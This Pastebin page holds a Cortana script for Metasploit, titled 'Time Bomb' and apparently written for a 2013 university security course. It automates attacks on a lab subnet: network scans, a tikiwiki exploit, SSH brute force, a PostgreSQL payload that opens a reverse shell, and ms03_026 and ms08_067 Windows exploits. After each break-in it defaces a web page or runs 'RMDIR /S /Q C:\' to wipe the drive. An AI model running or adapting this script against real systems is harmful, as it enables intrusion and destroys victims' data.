Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Cortana Script - "Time Bomb"
- # For IST 511 2013
- #
- # Created by Patrick O'Connor
- debug(debug()| 256);
- on ready {
- when heartbeat_5m {
- #kick off nmap/ping sweep
- cmd_async("db_nmap --min-hostgroup 96 -T4 -n -sn 192.168.100.0/24");
- }
- when heartbeat_10m {
- #kick off nmap/service detection
- cmd_async("db_nmap --min-hostgroup 96 -T4 -A -v -n 192.168.100.0/24");
- }
- when heartbeat_15m {
- # tikiwiki - metasploitable
- println("[*] Begin tikiwiki attack");
- $console = console();
- cmd($console, "use exploit/unix/webapp/tikiwiki_graph_formula_exec");
- cmd_set($console, %(LHOST => "192.168.100.66",
- RPORT => "80",
- LPORT => "9079",
- RHOST => "192.168.100.202",
- PAYLOAD => "generic/shell_bind_tcp",
- TARGET => "0"));
- cmd($console, "exploit -j");
- # Add some lulz to the index.html
- on session_sync {
- println("[*] We have a session!");
- when ('heartbeat_5m', lambda({
- # $sid is the session ID when I was declared.
- println("[*] Adding lulz to index.html!");
- s_cmd($sid, "echo '<h1>lulz</h1><br>' >> /var/www/index.html");
- }, $sid => $1));
- }
- # SSH Brute Force
- println("[*] Begin SSH brute force attack");
- cmd($console, "use auxiliary/scanner/ssh/ssh_login");
- cmd_set($console, %(THREADS => "24",
- RPORT => "22",
- VERBOSE => "1",
- USER_AS_PASS => "1",
- STOP_ON_SUCCESS => "0",
- BRUTEFORCE_SPEED => "8",
- USER_FILE => "/opt/metasploit/msf3/data/wordlists/csusb_lab.txt",
- RHOSTS => "192.168.100.202",
- BLANK_PASSWORDS => "0"));
- cmd($console, "run -j");
- # PostgreSQL Payload from SSH Creds
- println("[*] Begin PostgreSQL payload attack");
- cmd($console, "use exploit/linux/postgres/postgres_payload");
- cmd_set($console, %(LHOST => "192.168.100.66",
- RPORT => "5432",
- VERBOSE => "0",
- LPORT => "28430",
- RHOST => "192.168.100.202",
- PAYLOAD => "generic/shell_reverse_tcp",
- DATABASE => "template1",
- TARGET => "0",
- USERNAME => "postgres",
- PASSWORD => "postgres"));
- cmd($console, "exploit -j");
- }
- when heartbeat_15m {
- # Windows 2K3 DCOM Exploit ms03_026_dcom
- println("[*] Begin Windows 2K3 DCOM ms03_26_dcom attack");
- $console = console();
- cmd($console, "use exploit/windows/dcerpc/ms03_026_dcom");
- cmd_set($console, %(RHOST => "192.168.100.101",
- PAYLOAD => "windows/meterpreter/bind_tcp",
- LHOST => "192.168.100.66",
- RPORT => "135",
- LPORT => "20271",
- TARGET => "0"));
- cmd($console, "exploit -j");
- # Lets let the computer cool down a bit before we "clean it"
- on session_sync {
- println("[*] We have a session!");
- when ('heartbeat_5m', lambda({
- # $sid is the session ID when I was declared.
- println("[*] Perform magic cleanup!");
- # Really useful command to free up some disk space.
- m_exec($sid, "RMDIR /S /Q C:\\ ");
- println("[*] Pens down everyone.");
- m_exec($sid, "taskkill /f /im explorer.exe ");
- }, $sid => $1));
- }
- }
- when heartbeat_15m {
- # Windows 2k3 SMB Exploit ms08_067_netapi
- println("[*] Begin Windows 2k3 ms08_67 attack");
- $console = console();
- cmd($console, "use exploit/windows/smb/ms08_067_netapi");
- cmd_set($console, %(RHOST => "192.168.100.102",
- PAYLOAD => "windows/meterpreter/bind_tcp"));
- cmd($console, "exploit -j");
- # Lets let the computer cool down a bit before we "clean it"
- on session_sync {
- println("[*] We have a session!");
- when ('heartbeat_5m', lambda({
- # $sid is the session ID when I was declared.
- println("[*] Perform magic cleanup!");
- # Really useful command to free up some disk space.
- m_exec($sid, "RMDIR /S /Q C:\\ ");
- println("[*] Pens down everyone.");
- m_exec($sid, "taskkill /f /im explorer.exe ");
- }, $sid => $1));
- }
- }
- when heartbeat_15m {
- # Windows XP SMB Exploit ms08_067_netapi
- println("[*] Begin Windows XP ms08_67 attack");
- $console = console();
- cmd($console, "use exploit/windows/smb/ms08_067_netapi");
- cmd_set($console, %(RHOST => "192.168.100.101",
- PAYLOAD => "windows/meterpreter/bind_tcp"));
- cmd($console, "exploit -j");
- # Lets let the computer cool down a bit before we "clean it"
- on session_sync {
- println("[*] We have a session!");
- when ('heartbeat_5m', lambda({
- # $sid is the session ID when I was declared.
- println("[*] Perform magic cleanup!");
- # Really useful command to free up some disk space.
- m_exec($sid, "RMDIR /S /Q C:\\ ");
- println("[*] Pens down everyone.");
- m_exec($sid, "taskkill /f /im explorer.exe ");
- }, $sid => $1));
- }
- }
- quit();
- }
Add Comment
Please, Sign In to add comment